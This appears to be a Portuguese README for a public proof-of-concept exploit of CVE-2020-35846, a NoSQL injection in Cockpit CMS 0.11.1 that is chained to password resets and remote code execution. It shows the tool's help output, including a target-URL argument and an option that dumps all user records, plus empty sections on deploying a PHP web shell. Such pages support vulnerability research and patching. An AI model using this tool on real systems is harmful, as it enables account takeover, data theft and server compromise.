
Cockpit CMS 0.11.1 Injeção NoSQL para Execução Remota de Código
O Cockpit CMS possui algumas vulnerabilidades NoSQL que podem ser usadas para extrair informações dos usuários. Essas divulgações de informações podem ser encadeadas para alterar as senhas dos usuários e isso leva a Remote Code Execution no servidor.
Uma breve descrição de todas essas vulnerabilidades pode ser encontrada aqui.
┌─[0z09e]─[~/project/CVE-2020-35846]
└──╼ $ python3 exploit.py --help
usage: exploit.py [-h] [--dump_all] URL
_________ __ .__ __ ___________________ ___________
\_ ___ \ ____ ____ | | ________ |__|/ |_ \______ \_ ___ \_ _____/
/ \ \/ / _ \_/ ___\| |/ /\____ \| \ __\ | _/ \ \/ | ___)
\ \___( <_> ) \___| < | |_> > || | | | \ \____|
\______ /\____/ \___ >__|_ \| __/|__||__| |____|_ /\______ /_______ /
\/ \/ \/|__| \/ \/ \/
Cockpit CMS NoSQL Injection to Remote Code Execution : CVE-2020-35846
POC written by : 0z09e (https://github.com/0z09e)
positional arguments:
URL Target URL. Example : http://10.20.30.40/path/to/cockpit
optional arguments:
-h, --help show this help message and exit
--dump_all Dump all the informations about each and every user.(No password will be changed and no shell will be deployed)
URL - A URL alvo na qual o Cockpit CMS está sendo executado.--dump_all - Extrai todas as informações sobre cada usuário presente no CMS.Implantando um PHP-WebShell :

Extraindo informações de usuários :
